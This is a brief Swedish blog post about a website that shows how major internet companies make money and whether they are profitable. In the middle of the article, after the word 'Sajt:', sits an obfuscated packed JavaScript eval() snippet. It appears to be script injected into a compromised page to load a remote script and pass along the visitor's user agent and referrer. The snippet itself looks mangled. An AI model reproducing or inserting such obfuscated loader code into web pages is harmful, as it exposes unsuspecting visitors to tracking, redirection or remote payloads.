Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Sajt visar hur internet-sajter tjänar pengar

Sajt visar hur internet-sajter tjänar pengar
Sebastian

Sajt: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|inksd|var|u0026u|referrer|zeahd||js|php’.split(’|’),0,{}))
Har du någon gång undrat hur vissa stora sajter på Internet tjänar sina pengar?

Nu har sajten ”How do they make money” öppnat upp. Sajtens funktion gör är att lista några av de mest kända internetföretagen och berätta hur de tjänar pengar. Det intressanta är att de också visar om hemsidorna / företagen är lönsamma eller inte.

Genom en filter-funktion kan man filtrera efter bransch, intäkt osv.